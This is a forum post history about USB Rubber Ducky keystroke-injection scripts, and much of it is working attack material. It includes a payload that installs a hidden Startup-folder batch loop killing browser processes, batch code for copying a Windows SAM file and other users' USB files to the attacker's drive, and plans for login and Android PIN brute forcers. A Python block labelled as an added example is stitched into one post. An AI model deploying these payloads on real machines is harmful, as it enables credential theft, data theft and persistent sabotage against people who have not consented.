Posts posted by overwraith
-
I haven't had a chance to take a look at the firmware source code, or look into firmware creation, but I hope to as soon as I find some more time. I was just curious as to whether or not it is possible to create firmware that selects the type of keyboard for the Ducky randomly, e.g. Dell keyboard, generic Logitech keyboard, etc.
My reason for asking is that it is probably just a matter of time until someone figures out how to ban the keyboard type the Ducky uses.
I don't want to create any more work for the developers just yet, since I hear they are very busy. This is just some food for thought.
-
Keep up the good work snake, we all know you have been working hard.
-
This is going to need to be approached from another language instead of batch. Maybe VBS, Python, or PowerShell.
-
What would be better is a Windows and/or Linux app that organizes payloads and does all the commands to upload to the SD card. No offence, but loading payloads the current way is just as cumbersome or worse than using a GUI (Arduino) and a Teensy. There is also an annoying bug where Java needs to be added to some setting inside DOS; having an app to fix common issues would be cool :-)
I was looking into making an Android app so I could just select the payload from the development files on my SD card, but that quickly fell through when I couldn't find any RTF file support in Android. It would be cool if we (the community) could make an Android GUI/friendly compiler, because that would mean you could compile from your phone or tablet. Would mean mobile payload selection.
YAY, someone mentioned my SAM payload improvement on the web show!!!
-
I think I speak for a lot of duck scripters here when I say how do we program the duck with C++ like shown here? Did I miss a memo? Where's the tutorial on that awesomeness?
-
I'm glad people think this is cool. I will look into using SamInside or the export to NTLM hashes, then Cain or a GPU cracker. As far as the methods of recording more than one SAM, I will look into both methods, the %computername%, and accumulating in a text file. I am a little worried with the accumulation into a text file that programs will have trouble reading the back-to-back encrypted data, but if all SAM files are the same size, then it shouldn't be a problem, as we can always parse the data via command filters/flags, or separate it into other files later. Good points from everybody.
-
Started working on getting the used space on a drive, and I tried to make a "for" loop to do that too, and got some weird output. So for our resident bug hunters, does this look like a variable overflow situation?
cmd.exe /V:ON
Set /A usedSpace=0
for /R %i in (*) do Set /A usedSpace+=%~zi
Yields>
C:\>Set /A usedSpace+=8635
-1933490268
C:\>Set /A usedSpace+=5379
-1933484889
C:\>Set /A usedSpace+=22368
-1933462521
C:\>Set /A usedSpace+=2048
-1933460473
C:\>Set /A usedSpace+=844
-1933459629
C:\>Set /A usedSpace+=4726
-1933454903
C:\>Set /A usedSpace+=5182
-1933449721
C:\>Set /A usedSpace+=153298
-1933296423
C:\>Set /A usedSpace+=31
-1933296392
C:\>Set /A usedSpace+=1142784
-1932153608
C:\>Set /A usedSpace+=1630208
-1930523400
C:\>Set /A usedSpace+=540672
-1929982728
C:\>
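An added example, not part of the original post: cmd.exe `set /A` works on signed 32-bit integers, so a running total of file sizes goes negative once it passes 2147483647 bytes. The Python below models that accumulation, assuming two's-complement wraparound, and replays the increments shown in the session above; the helper names and the 1 GiB sample sizes are constructed for illustration.

```python
"""Model of cmd.exe `set /A` accumulation on signed 32-bit integers."""

INT32_MIN, INT32_MAX = -2**31, 2**31 - 1


def wrap32(value):
    """Reduce any integer to the signed 32-bit value a wrapped sum would show."""
    return (value - INT32_MIN) % 2**32 + INT32_MIN


def accumulate(sizes, start=0):
    """Add sizes the way `set /A usedSpace+=%~zi` does in the post.

    Returns (wrapped_total, true_total, first_wrap_index); the index is None
    when the running sum never left the signed 32-bit range.
    """
    wrapped, true_total, first_wrap = start, start, None
    for i, size in enumerate(sizes):
        true_total += size
        wrapped = wrap32(wrapped + size)
        if first_wrap is None and wrapped != true_total:
            first_wrap = i
    return wrapped, true_total, first_wrap


def smallest_true_total(displayed):
    """Smallest non-negative byte count that displays as `displayed` (one wrap)."""
    return displayed if displayed >= 0 else displayed + 2**32


# First running total and the later increments, copied from the session above.
POST_START = -1933490268
POST_DELTAS = [5379, 22368, 2048, 844, 4726, 5182, 153298, 31,
               1142784, 1630208, 540672]

# Constructed sample: three 1 GiB files are enough to cross 2**31 - 1.
GIB = 2**30
SAMPLE_SIZES = [GIB, GIB, GIB]

if __name__ == "__main__":
    # Replaying the post's increments reproduces its final displayed value.
    print(accumulate(POST_DELTAS, POST_START)[0])
    # The constructed sample wraps on the second file (index 1).
    print(accumulate(SAMPLE_SIZES))
    # At least this many bytes had been summed when the first value was shown.
    print(smallest_true_total(POST_START))
```

The increments in the post add up exactly as 32-bit arithmetic predicts, so the negative totals come from a sum that had already wrapped before the displayed portion of the output.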
-
I am starting work on a Ducky USB file theft payload. The following code will execute directly in the command prompt, iterate through the possible drive letters, and ignore your "evac drive" (evac==evacuation), which will have a text file evac.txt on the root. The idea is to download 7zip, install it silently, then run the commands that will search out attached USB drives, and archive the files to your USB drive. The following is the code that will find the drives, and save them to a variable so we can send their locations to the 7zip application as arguments.
REM SET THE FLAG FOR ENABLE DELAYED ENVIRONMENT VARIABLE EXPANSION
REM FROM WHAT I UNDERSTAND THERE ARE INDIRECTION PROBLEMS WHEN NOT
REM SET AND THE VARIABLE IS CALLED MULTIPLE TIMES ON THE SAME LINE
cmd.exe /V:ON
REM IF SOME TEXT IS NOT ASSIGNED TO THIS VARIABLE THE LOOP WILL FAIL AND
REM CAUSE THE VARIABLE NAME TO BE ASSIGNED TO THE BEGINNING OF THE LIST
Set targetDr=*
REM THE FOR LOOP THAT SEEKS OUT SUITABLE DRIVES, HAS SOME NIFTY INDIRECTION
REM OPERATORS "!" WHICH ARE USED WHEN THE VARIABLE IS CALLED MULTIPLE
REM TIMES IN THE SAME LINE SO IT CAN TAKE ADVANTAGE OF THE ENABLED DELAYED
REM EXPANSION WE SET EARLIER
for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( IF NOT EXIST %a:\evac.txt If EXIST %a:\ SET targetDr=!targetDr! %a: )
REM REMOVE THE SINGLE CHARACTER OF TEXT WE ASSIGNED TO THE
REM LIST VARIABLE EARLIER
Set targetDr=%targetDr:~1%
REM SHOW ME THE OUTPUT
echo %targetDr%
The next great hurdle in this payload will be figuring out a way to determine the size of the attached drives, so we can tell whether or not it is a flash drive by its disk size. We don't want to end up trying to copy a hard drive to a flash drive that's not big enough.
If the "stealthiness" of this attack becomes a problem later, we can rely on something from the switchblade project to email the data to us.
-
This PowerShell download seems to work a lot better than the VBS version did. I have had a lot more luck downloading from sites that didn't support whatever protocol the VBS script did.
-
The color matters because the subsequent duck versions are all different colors. Typically each time the hardware changes the duck changes colors. I think the order goes something like this; green=version1, Red=version2, silver/white=version3, or something like that. The green ducks had a lock on the SD card that involved pulling out a lever to release the SD card; all subsequent versions are removable simply by pulling the SD card out the back (first time typically needs a pair of tweezers).
-
Got one of the payloads to find a second USB, short "for" loop on my posting;
http://forums.hak5.o...to-sam-payload/
Made mine specifically for the SAM theft payload, but the command can be modified.
-
The following is a prank script that runs a batch loop that kills processes that you specify. A key characteristic of this particular script is that it uses a vbs script to run the batch script silently. When I was making this script I was surprised to learn that newer OSes do not run batch scripts silently. I got the vbs script someplace else, but I don't remember where. I have seen this script online on several websites though. The naming convention of the files produced is intentionally ambiguous, e.g. a.bat, b.vbs.
CONTROL ESC
DELAY 200
STRING cmd
ENTER
REM A Different directory in case the second one is inaccessible
DELAY 1000
STRING cd %userprofile%\Downloads\
ENTER
DELAY 1000
STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
ENTER
DELAY 100
REM Delete batch file if already exists
STRING erase /Q a.bat
ENTER
REM Make the batch file
STRING copy con a.bat
ENTER
DELAY 100
STRING @echo off
ENTER
STRING :Start
ENTER
STRING taskkill /f /im "iexplore.exe"
ENTER
STRING taskkill /f /im "firefox.exe"
ENTER
STRING taskkill /f /im "devenv.exe"
ENTER
STRING taskkill /f /im "pennote.exe"
ENTER
STRING timeout /t 30
ENTER
STRING Goto Start
ENTER
CONTROL Z
ENTER
DELAY 100
REM Only way to run a batch file silently on vista/Win7
REM Delete vbs file if already exists
STRING erase /Q b.vbs
ENTER
STRING copy con b.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.Run chr(34) & "a.bat" & Chr(34), 0
ENTER
STRING Set WshShell = Nothing
CONTROL Z
ENTER
STRING b.vbs
ENTER
DELAY 100
STRING EXIT
ENTER
-
Looks like all the bugs were worked out with that last command. Anyone have some batch magic for renaming the SAM like the following;
SAM --> SAM1
--> SAM2
--> SAM3
--> SAM4
; So we can store multiple user SAMs without losing the ones we have already collected? Also, does anyone have a program for brute forcing the password out of these SAMs?
-
I spoke a little too soon, don't use CD for change directory as I did in the first post, use the following;
for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: )
-
If you add a removable flash drive and USB hub to the Ducky SAM attack (take 'em with you in your pocket + use the hub to plug in simultaneously) and add the file evac.txt to the flash drive's root, you can replace the CD <Directory> command in the SAM payload with this command, which will auto-magically send the SAM file to the flash drive. If we ever get the mass storage firmware we won't even need the hub and flash drive. I am still testing this, so an additional delay may need to be added after this command.
STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt cd %a:\ )
-
Unfortunately, in Windows Vista MS Paint is a little bit different. The custom color picker selects a seemingly random color slot after you input the first couple of colors. It seems unfeasible to create a duck script for this action on Vista.
-
Here is a tweaked version that has a delete command so the duckscript can be run multiple times on computers without any problems.
Tried to use the WRITELINE command to replace the STRING ENTER commands, but it looks like the delay command on the online compiler may not work for WRITELINE. Couldn't find a way to slow the commands down enough to prevent the script from messing up. Defaulted back to STRING ENTER commands.
REM MOBILETABS.TXT BEGINS
REM HIDE COMMAND WINDOW
CONTROL ESCAPE
STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM DELETE THE SCRIPT IF IT ALREADY EXISTS
STRING DEL /Q MobileTabs.vbs
ENTER
REM VB SCRIPT FOUND AT:
REM http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.htmlinternetexplorer
REM INPUT FILE MobileTabs.vbs
STRING copy con MobileTabs.vbs
ENTER
STRING on error resume next
ENTER
STRING navOpenInBackgroundTab = &h1000
ENTER
STRING set oIE = CreateObject("InternetExplorer.Application")
ENTER
STRING Set args = WScript.Arguments
ENTER
STRING oIE.Navigate2 args.Item(0)
ENTER
STRING for intx = 1 to args.count
ENTER
STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab
ENTER
STRING next
ENTER
STRING oIE.Visible = true
ENTER
CONTROL Z
ENTER
REM LATER WILL TYPE THE WEBSITES TO A TEXT FILE,
REM AND SEND THE FILE TO THE VB SCRIPT
REM RUN THE VB SCRIPT TO LAUNCH INTERNET EXPLORER
STRING MobileTabs.vbs http://www.google.com/ http://mwomercs.com/ http://hak5.org/ http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/
ENTER
-
The following is some duck script I made for easily setting up the MS Paint hack from way back in episode 925. Machines secured correctly with group policies are not susceptible to this attack. You are still required to save the file correctly, and input the colors in the correct order, but they should already be in the correct order in the custom color box. This particular variant only works on Windows 7, but could be easily modified for Vista.
REM MSPAINT hack revealed by "Operator"
CONTROL ESCAPE
DELAY 200
STRING mspaint
ENTER
DELAY 1000
CTRL E
STRING 6
TAB
STRING 1
Enter
CTRL PAGEUP
REPEAT 5
REM ****FIRST COLOR****
ALT H
STRING EC
ALT R
STRING 10
TAB
STRING 0
TAB
STRING 0
ENTER
REM ****SECOND COLOR****
ALT H
STRING EC
ALT R
STRING 13
TAB
STRING 10
TAB
STRING 13
ENTER
REM ****THIRD COLOR****
ALT H
STRING EC
ALT R
STRING 100
TAB
STRING 109
TAB
STRING 99
ENTER
REM ****FOURTH COLOR****
ALT H
STRING EC
ALT R
STRING 120
TAB
STRING 101
TAB
STRING 46
ENTER
REM ****FIFTH COLOR****
ALT H
STRING EC
ALT R
STRING 0
TAB
STRING 0
TAB
STRING 101
ENTER
REM ****SIXTH COLOR****
ALT H
STRING EC
ALT R
STRING 0
TAB
STRING 0
TAB
STRING 0
ENTER
-
You got a good point about just grabbing the SAM file instead of performing a brute force on site. I'm not really a pen tester or hacker, so I'm just starting to learn the ropes. Thanks for the reply.
-
Here is some duck script I made that;
-Types in a VB Script that opens tabs in internet explorer
-Runs the VB Script with the proper arguments that opens the desired webpages in internet explorer.
Not exactly hacking, but could be useful to somebody.
The VB Script was written by somebody else and the author's post can be found at:
http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.html
Made the duck script specifically so I could pick up and move permalinks from databases like EBSCOhost to other computers and quickly open them during the research stages of papers.
REM MOBILETABS.TXT BEGINS
REM HIDE COMMAND WINDOW
CONTROL ESCAPE
STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM VB SCRIPT FOUND AT:
REM http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.htmlinternetexplorer
REM INPUT FILE MobileTabs.vbs
STRING copy con MobileTabs.vbs
ENTER
STRING on error resume next
ENTER
STRING navOpenInBackgroundTab = &h1000
ENTER
STRING set oIE = CreateObject("InternetExplorer.Application")
ENTER
STRING Set args = WScript.Arguments
ENTER
STRING oIE.Navigate2 args.Item(0)
ENTER
STRING for intx = 1 to args.count
ENTER
STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab
ENTER
STRING next
ENTER
STRING oIE.Visible = true
ENTER
CONTROL Z
Enter
REM LATER WILL TYPE THE WEBSITES TO A TEXT FILE,
REM AND SEND THE FILE TO THE VB SCRIPT
REM RUN THE VB SCRIPT TO LAUNCH INTERNET EXPLORER
STRING MobileTabs.vbs http://www.google.com/ http://mwomercs.com/ http://hak5.org/ http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/
Enter
-
Kinda resurrecting a dead topic, but actually, mouse movement could add a lot of functionality to the USB Rubber Ducky. If you know the screen size of your target, and use something like the Logitech G13 and its internal Lua scripting to grab screen pixel values, and you full-screened some applications, you could use any buttons on the application with the Ducky regardless of whether they support key combos. By the same token, however, you could probably program the Logitech G13 to do pretty much anything the Ducky can anyway. I prefer the Ducky though, since it is a small and flash-drive-like poison pill.
-
I have looked around for brute forcer code, and discovered that the number of combinations required for even 4 character passwords makes it impractical to implement a Ducky brute forcer. The only way to possibly make this feasible would be to use something like CUPP, the common user password profiler, to generate a small password file, and then use a modified version of my duckscript converter or someone else's duckscript converter to turn the file into duckscript. Even then it still might prove impractical. Probably best to keep the duck running command line exploits and payloads etc.
-
Does anyone know if anyone has made a Ducky login brute forcer?
Any tips if I wanted to make my own?
I would probably use a Java app to generate the duckscript based on a dictionary file.
If I had multiple ducks and multiple computers, say an unguarded computer lab, I could probably get in faster.
[Payload] Android Brute Force 4-digit pin
in Classic USB Rubber Ducky
Posted · Edited by overwraith
I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.
C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec
ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$
/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE
R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
C:\Users\UserName\Desktop>dir android*
Volume in drive C has no label.
Volume Serial Number is 2499-C7D7
Directory of C:\Users\UserName\Desktop
07/07/2012 01:03 AM 165 Android Paths.txt
08/30/2012 08:00 PM 50 Android SDK Path.txt
12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt
3 File(s) 278 bytes
0 Dir(s) 831,818,436,608 bytes free
C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt
DELAY 5000 ; echo {0000..9999}
STRING
DELAY 1000
ENTER
ENTER
C:\Users\UserName\Desktop>